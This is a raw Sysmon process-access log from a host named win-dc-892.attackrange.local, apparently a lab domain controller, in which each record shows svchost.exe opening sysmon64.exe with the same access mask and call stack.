12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.815{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 